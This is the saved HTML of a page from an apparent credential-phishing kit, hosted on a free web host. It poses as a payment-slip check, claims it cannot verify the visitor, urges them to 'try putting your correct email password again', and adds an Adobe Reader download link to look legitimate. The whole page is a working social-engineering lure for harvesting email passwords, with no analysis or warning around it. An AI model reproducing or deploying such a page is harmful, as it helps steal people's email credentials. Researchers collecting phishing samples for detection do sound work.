
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0102)http://www.bbgdubai.com/cgi-sys/bxd.cgi?a=abdulrahman@bbgdubai.com&id=JuQBqHF81ZXWCWyDC2d1N-1495108201 -->
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<link href="./Message_files/style.css" rel="stylesheet" type="text/css">
<title>DENIED</title>
<style type="text/css" id="igtranslator-color"></style></head>

<body>
<div class="container">
<div class="logo"><img src="./Message_files/logo.png" width="131" height="135" alt="logo"></div>
<div class="message-box">
<div class="message-icon"><img src="./Message_files/delivery-success.png" width="90" height="100" alt="success"></div>
<div class="message-content">
<h2 class="success">SORRY!!!</h2>
<p><STRONG>WE ARE UNABLE TO IDENTIFY THAT THIS PAYMENT SLIP BELONGS TO YOU<br><br> PLEASE GO BACK AND TRY PUTTING YOUR CORRECT EMAIL PASSWORD AGAIN<br><br> <font color="#aa0000">OR CONTACT SENDER FOR MORE INFO...<br></font></STRONG></p>
</div>
<div class="clear"></div>
</div>
<div class="message-shadow"></div>
</div>
<a class="center" href="https://get.adobe.com/reader/otherversions/" data-page="login"> <strong><font color="#ff0000">DOWNLOAD ADOBE READER>>></font></strong></a>


<div class="igtranslator-main-div" style="display: none; width: 0px; height: 0px;"><iframe src="./Message_files/saved_resource.html" class="igtranslator-iframe" scrolling="no" frameborder="0"></iframe></div><div class="igtranslator-activator-icon bounceIn" style="background-image: url(&quot;chrome-extension://jgnebchahhepphmokjeohhoebakpfggp/data/icons/home.png&quot;); display: none;" title="Click to Show Translation"></div><div style='text-align: right;position: fixed;z-index:9999999;bottom: 0; width: 100%;cursor: pointer;line-height: 0;'><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website_app-online436363772&utm_content=footer_img"><img src="https://cloud.githubusercontent.com/assets/23024110/20663010/9968df22-b55e-11e6-941d-edbc894c2b78.png"  alt="www.000webhost.com"></a></div></body></html>